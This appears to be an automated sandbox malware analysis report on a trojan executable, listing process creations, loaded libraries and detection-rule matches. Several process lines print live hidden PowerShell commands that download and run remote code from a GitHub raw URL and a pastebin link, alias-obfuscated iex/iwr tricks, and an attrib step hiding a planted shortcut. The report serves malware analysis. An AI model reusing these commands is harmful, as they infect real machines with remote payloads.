Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0828EF804_2_0828EF80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0828B5E84_2_0828B5E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_082BEDAC4_2_082BEDAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0833D1184_2_0833D118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_083334E04_2_083334E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0833E6D04_2_0833E6D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0833B0C04_2_0833B0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_083399784_2_08339978
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0833B9F04_2_0833B9F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_083334E04_2_083334E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0833DDB84_2_0833DDB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_083451B84_2_083451B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0834AEE04_2_0834AEE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_083478384_2_08347838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0834F1384_2_0834F138
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081C19B94_2_081C19B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081C8B314_2_081C8B31
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081C8B404_2_081C8B40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10D1F15818_2_00007FFB10D1F158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10D1134818_2_00007FFB10D11348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10D1E82318_2_00007FFB10D1E823
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10D262DE18_2_00007FFB10D262DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10D1C85018_2_00007FFB10D1C850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10D3F85018_2_00007FFB10D3F850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10FBB61818_2_00007FFB10FBB618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10FBCCFD18_2_00007FFB10FBCCFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB111179CD18_2_00007FFB111179CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111E1CD18_2_00007FFB1111E1CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111099F18_2_00007FFB1111099F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB11121DAD18_2_00007FFB11121DAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111DE5918_2_00007FFB1111DE59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111723918_2_00007FFB11117239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB11120CAD18_2_00007FFB11120CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1112191918_2_00007FFB11121919
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111852D18_2_00007FFB1111852D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB11110FBD18_2_00007FFB11110FBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111079D18_2_00007FFB1111079D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB111107F518_2_00007FFB111107F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB11116C7D18_2_00007FFB11116C7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111129D18_2_00007FFB1111129D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB113CF0B618_2_00007FFB113CF0B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB113CF12618_2_00007FFB113CF126
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB114D573818_2_00007FFB114D5738
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB114DF75618_2_00007FFB114DF756
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1175667C18_2_00007FFB1175667C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1175CA1918_2_00007FFB1175CA19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB11112FA118_2_00007FFB11112FA1
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: String function: 00679060 appears 48 times
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932
Source: Lm9IJ4r9oO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi64_4116.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7688.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4116, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@26/26@5/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7676
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jugoohmy.mwd.ps1Jump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: htt0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: ps://raw.githu0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: busercontent.c0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: om/labail300/ps0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: >-i0_2_00692C90
Source: Lm9IJ4r9oO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Lm9IJ4r9oO.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\Lm9IJ4r9oO.exe "C:\Users\user\Desktop\Lm9IJ4r9oO.exe"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
